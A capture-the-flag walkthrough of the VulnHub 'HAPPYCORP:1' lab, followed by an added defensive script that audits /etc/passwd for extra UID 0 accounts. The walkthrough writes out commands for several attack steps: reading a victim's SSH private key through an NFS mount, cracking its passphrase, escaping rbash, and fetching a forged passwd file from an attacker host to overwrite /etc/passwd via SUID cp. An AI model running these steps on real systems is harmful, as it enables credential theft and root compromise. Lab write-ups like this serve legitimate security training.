This is another post on a VulnHub CTF named "HAPPYCORP:1" by Zayotic. It is designed for the VMware platform, and it is a boot-to-root challenge where you have to find the flags to finish the task assigned by the author.
You can download it from here: https://www.vulnhub.com/entry/happycorp-1,296/
Penetrating Methodologies
Scanning
· Netdiscover
· Nmap
Enumeration
· NFS share
· Mount shared directory
· Obtain user.txt (1st flag)
· Obtain SSH key
· Crack SSH passphrase (John the Ripper)
Exploiting
· Login to SSH
· Break jail (rbash shell)
Privilege Escalation
· Abusing SUID binary
· Obtain flag.txt (2nd flag)
Walkthrough
Scanning
Let's start with network scanning to identify the IP of the VM with the help of netdiscover.
So, we have our target IP 192.168.1.104. Now, let's scan the services and ports via nmap.
nmap -A 192.168.1.104
We have obtained a fruitful result from the nmap scan: as you can observe, several services are running on various ports, such as 22: SSH, 80: HTTP and so on.
Enumeration
As we always explore the HTTP service first, we browsed http://192.168.1.104 as the URL but found nothing interesting.
We found that a network share service (NFS) was also available on port 2049, so we decided to check for shared directories on the network. We therefore installed an NFS client on our local machine and ran the following command to identify the shared directories available to mount on our local computer.
showmount -e 192.168.1.104
We found that /home/karl is a shared directory that we can mount on our local machine as given below:
mkdir /tmp/raj
mount 192.168.1.104:/home/karl /tmp/raj
cd /tmp/raj
ls -al
I mounted /home/karl on our /tmp/raj directory but didn't find anything here; in fact, when I tried to open the .ssh directory, it gave a permission denied error.
Therefore, I added a user "aaru" belonging to a group with GID 1001 on my Kali machine and successfully accessed the .ssh folder as shown in the steps below (the same approach was used in Lin-Security).
groupadd --gid 1001 aaru
useradd --uid 1001 --gid 1001 aaru
Then we accessed our 1st flag, i.e. user.txt, and moreover copied the id_rsa key to our local machine by executing the following commands:
sudo -u aaru ls -l .ssh
sudo -u aaru cat .ssh/user.txt
sudo -u aaru cat .ssh/id_rsa
Further, I explored id_rsa.pub and authorized_keys, where I noticed karl@happycorp and realized that karl could be the username for SSH login. Therefore, I used the id_rsa key to log in to SSH as karl but failed, as the key required a passphrase.
Then we used ssh2john to convert this SSH key into a crackable file for John the Ripper, and further used the rockyou.txt wordlist with John the Ripper.
python ssh2john key > ssh_login
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_login
After obtaining the passphrase "sheep", we changed the permissions of the RSA key and logged in as karl, but unfortunately we got a restricted shell, also known as rbash.
ssh -i key karl@192.168.1.104
Therefore, I tried to access a shell directly through SSH by simply typing the following:
ssh -i key karl@192.168.1.104 -t "/bin/sh"
Luckily it worked, and we successfully got a proper shell.
Privilege Escalation
Now it's time to escalate to root privileges and finish this task. With the help of the find command I looked for SUID-enabled binaries, where I found the SUID bit is enabled on the copy binary (/bin/cp).
find / -perm -u=s -type f 2>/dev/null
Hmm!! If the SUID bit is enabled on /bin/cp, then we can copy any root-owned system file or overwrite an existing one. First, I explored the /etc/passwd file, where karl was the last user as shown in the image below, and our plan is to edit this file by adding a new user.
On the other hand, we generated a new encrypted password for pass123 using OpenSSL passwd:
openssl passwd -1 -salt ignite pass123
So, we copied the whole content of the /etc/passwd file into a text editor and then created a new record for the user "ignite" that owns root-level permissions (UID 0, with the hash above in the password field). We saved this file as passwd and further used a Python web server to transfer it to the victim's machine.
Inside the /tmp folder we downloaded our passwd file and, with the help of the copy command, replaced the original /etc/passwd with our file as shown below.
cd /tmp
wget http://192.168.1.111:8000/passwd
cp passwd /etc/passwd
su ignite
cd /root
cat root.txt
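The passwd overwrite above leaves a distinctive artefact: a second UID 0 account whose password hash sits directly in /etc/passwd instead of /etc/shadow. The following audit script is an added example (not part of the original walkthrough) that parses passwd-format text and flags such records; the sample content and the `PLACEHOLDERHASH` value are constructed.

```python
import re

# crypt(3)-style prefixes ($1$ is the MD5-crypt that "openssl passwd -1" emits);
# any of these in field 2 means the hash bypasses /etc/shadow entirely.
CRYPT_HASH = re.compile(r"^\$(1|2[abxy]?|5|6|y)\$")

def parse_passwd(text):
    """Split passwd-format text into one dict per record (7 colon-separated fields)."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            records.append({"line": lineno, "malformed": line})
            continue
        keys = ("name", "pw", "uid", "gid", "gecos", "home", "shell")
        records.append(dict(zip(keys, fields), line=lineno))
    return records

def audit_passwd(text):
    """Return (line, finding) tuples for records a defender should question."""
    findings = []
    seen = {}  # uid -> first account name using it
    for r in parse_passwd(text):
        if "malformed" in r:
            findings.append((r["line"], "malformed record"))
            continue
        name, pw = r["name"], r["pw"]
        if not r["uid"].isdigit():
            findings.append((r["line"], f"non-numeric uid for {name}"))
            continue
        uid = int(r["uid"])
        if uid == 0 and name != "root":
            findings.append((r["line"], f"extra UID 0 account: {name}"))
        elif uid in seen:
            findings.append((r["line"], f"duplicate uid {uid}: {name} and {seen[uid]}"))
        seen.setdefault(uid, name)
        if pw == "":
            findings.append((r["line"], f"empty password field for {name}"))
        elif CRYPT_HASH.match(pw):
            findings.append((r["line"], f"password hash stored in passwd for {name}"))
    return findings

# Constructed sample: a small normal passwd plus the kind of record the walkthrough adds.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
karl:x:1001:1001:karl:/home/karl:/bin/rbash
ignite:$1$ignite$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
"""
```

Running `audit_passwd(SAMPLE_PASSWD)` reports the ignite record twice (extra UID 0 account and hash stored in passwd); a clean file returns an empty list, which makes it easy to diff against a known-good copy in a cron job.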